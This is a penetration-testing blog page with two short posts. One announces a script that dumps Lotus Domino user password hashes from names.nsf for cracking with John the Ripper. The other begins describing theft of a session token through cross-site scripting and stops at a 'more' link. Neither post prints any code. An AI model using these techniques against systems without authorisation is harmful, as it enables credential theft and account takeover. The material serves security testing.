Web Application

Lotus Domino 8.5 – Users’ Password Hashes Retriever

Updated my¬†GitHub to include a new script and added a link to my GitHub page on the sidebar of this blog. The script in question is the fetchDomino which is an utility that allows you to dump all Domino Lotus user’s password hashes. This script was created to replace Domino Raptor which did not work for me during testing of Lotus Domino 8.5

In a few words, this script can be used when we get access to the the Domino’s names.nsf file. Some servers may have this file completely exposed to the Internet, others instead would require authentication thus a brute-force attack or another attack vector may be required to get in. Once you have access to names.nsf, fetchDomino will come very handy as it will collect all user’s hashes in the database for you. Then use JTR dumbo patch with the “lotus5” format to crack these hashes.

If you are looking for a guide in how to hack Lotus Domino, refer to the document below:

http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Lotus_Domino).pdf

 

localStorage – Are Cookies Too Good For You?

I’ve seen several web applications implementing the user session ID (or token) in a custom HTTP header parameters thus avoiding to store the session ID in cookies. Additionally, some public web platforms save the same kind of token to track their user analytics. For instance, recently I notice that this mechanism was utilised by the New Relic REST API platform which is storing the user ID in a HTTP parameter called X-NewRelic-ID.

During testing of an application, I have found both a cross-site scripting and the session ID sent as HTTP header parameter . My goal was to steal the user’s session ID, which was sent to the application as X-Auth-Token in a custom HTTP header parameter.

(more…)